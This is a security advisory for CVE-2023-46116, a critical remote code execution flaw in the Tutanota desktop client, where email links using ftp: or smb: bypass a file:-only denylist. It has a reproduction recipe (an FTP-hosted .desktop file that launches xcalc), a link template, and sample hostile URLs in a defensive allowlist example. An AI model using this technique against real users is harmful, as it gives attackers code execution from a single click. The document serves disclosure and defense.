
Remote Code Execution via insufficiently sanitized call to shell.openExternal

Critical
charlag published GHSA-mxgj-pq62-f644 Dec 15, 2023

Package

npm tutao/tutanota (npm)

Affected versions

<=3.118.8

Patched versions

3.118.12

Description

Summary

Tutanota allows users to open links in emails in external applications (via Electron's shell.openExternal). It correctly blocks the file: URL scheme, which a malicious actor could use to gain code execution on the victim's computer, but it fails to block other harmful schemes such as ftp: and smb:, which can be used the same way: the link is handed to whatever application the operating system has registered for that scheme (on a Linux desktop, typically the file manager), which will fetch and open the remote target.
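As an added illustration of the check at issue (example code written for this page, not Tutanota's own implementation), the block below contrasts a denylist that rejects only file: with an allowlist of the schemes a mail client actually needs, applied before a link reaches shell.openExternal. The function names, the SAFE_SCHEMES set and the sample links are assumptions for the example; the injected open callback stands in for electron.shell.openExternal so the code runs under plain Node.js without Electron.

```javascript
// Added example (not Tutanota's code): a scheme denylist of the kind the
// advisory describes, beside the allowlist a desktop client should apply
// before calling Electron's shell.openExternal(). The names
// isAllowedDenylist, isAllowedAllowlist, SAFE_SCHEMES and openExternalGuarded
// are assumptions for this example. `URL` is Node's built-in WHATWG parser.

// Vulnerable pattern: only file: is rejected, so any other scheme the
// operating system has a handler for (ftp:, smb:, ...) is passed straight
// through to that handler.
function isAllowedDenylist(href) {
  return !href.toLowerCase().startsWith("file:");
}

// Hardened pattern: parse with the WHATWG URL parser and accept only the
// schemes the client needs. Parsing (instead of prefix-matching the raw
// string) normalises scheme case and strips leading C0 control characters
// and spaces, so the check sees the same scheme the OS handler will see.
const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);

function isAllowedAllowlist(href) {
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return false; // not an absolute URL: refuse rather than guess
  }
  return SAFE_SCHEMES.has(url.protocol);
}

// Gate in front of the external-open call. `open` is injected so this can
// be exercised without Electron; in a real client it would be
// electron.shell.openExternal. Returns whether the link was handed on.
function openExternalGuarded(href, open, policy = isAllowedAllowlist) {
  if (!policy(href)) {
    return false;
  }
  open(href);
  return true;
}

// Constructed sample links; only the ftp: one mirrors the advisory's PoC.
const SAMPLE_LINKS = [
  "https://example.com/",
  "mailto:someone@example.com",
  "file:///etc/passwd",
  "ftp://user:password@192.0.2.10/pwn.desktop", // shape of the PoC link
  "smb://192.0.2.10/share/pwn.desktop",
  "FTP://192.0.2.10/pwn.desktop", // scheme case variant
  " file:///etc/passwd", // leading space defeats the raw prefix check
  "\tjavascript:alert(1)", // leading tab, stripped by the URL parser
  "not a url",
];

// Evaluate every sample under both policies; returned rather than only
// printed so the results can be checked programmatically.
function compare(links = SAMPLE_LINKS) {
  return links.map((href) => ({
    href,
    denylist: isAllowedDenylist(href),
    allowlist: isAllowedAllowlist(href),
  }));
}

function printReport() {
  for (const row of compare()) {
    const d = row.denylist ? "DENYLIST PASSES " : "denylist blocks ";
    const a = row.allowlist ? "allowlist passes" : "ALLOWLIST BLOCKS";
    console.log(`${d} | ${a} | ${JSON.stringify(row.href)}`);
  }
}

printReport();
```

Running it shows that the denylist lets every ftp:, smb: and case- or whitespace-mangled link through, while the allowlist admits only the three http(s)/mailto links and refuses anything it cannot parse as an absolute URL. Whether a given platform's handler strips the leading space in the " file:" sample is platform-dependent, which is exactly why a parsed allowlist, not a raw prefix denylist, is the right shape for this check.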

Details

Steps to Reproduce

This PoC uses Ubuntu with the XFCE desktop environment, since that is the least complicated setup in which to reproduce it.

  • Run the Tutanota desktop version 3.118.8 AppImage on an Ubuntu desktop with the XFCE environment and log in.
  • On another machine, host an FTP server with anonymous access enabled. Create and place a pwn.desktop file in the FTP root, with the following content:
[Desktop Entry]
Exec=xcalc
Type=Application
  • Send an email to the account logged in on Tutanota containing a hyperlink to the pwn.desktop file on the FTP server, substituting the server's values in the hyperlink: ftp://username:password@ip-address/pwn.desktop.
  • In the Tutanota desktop application, click the hyperlink in the received email. Observe that the calculator application opens. In some cases you may need to confirm execution of the application.

Impact

Successful exploitation of this vulnerability enables an attacker to gain code execution on a victim's computer: the victim only needs to click a link in an email.

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
9.3 / 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

CVE ID

CVE-2023-46116
